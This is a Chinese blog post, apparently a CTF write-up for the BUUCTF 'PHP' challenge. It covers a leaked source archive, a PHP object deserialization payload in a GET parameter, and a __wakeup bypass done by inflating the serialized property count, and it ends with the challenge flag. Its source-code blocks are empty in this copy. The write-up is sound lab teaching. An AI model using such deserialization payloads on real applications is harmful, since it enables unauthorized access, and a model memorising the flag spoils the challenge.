【BUUCTF】PHP
敏感文件泄露
访问 www.zip
解压class.php
中是PHP源码
1 |
|
在对象初始化后用户名会被定义为 guest
,密码为 yesyes
,在销毁对象的时候,如果用户名为 admin
密码为 100
,则会返回flag
index.php
中的源码为:
1 |
|
用GET的方式接受 select
值并将其反序列化
payload:?select=O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
但是这里有一个问题,反序列化时会自动调用 __wakeup
方法,当放序列化时,属性个数大于实际个数时将不调用 __wakeup
方法,所以将个数改为3:?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
得到:flag{4062d09a-d74e-4a74-8a4c-2a65760f98f4}
- 标题: 【BUUCTF】PHP
- 作者: Itachi
- 创建于 : 2021-11-27 23:00:08
- 更新于 : 2021-11-28 02:34:48
- 链接: https://blog.tarchi.top/ctf/【BUUCTF】PHP/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论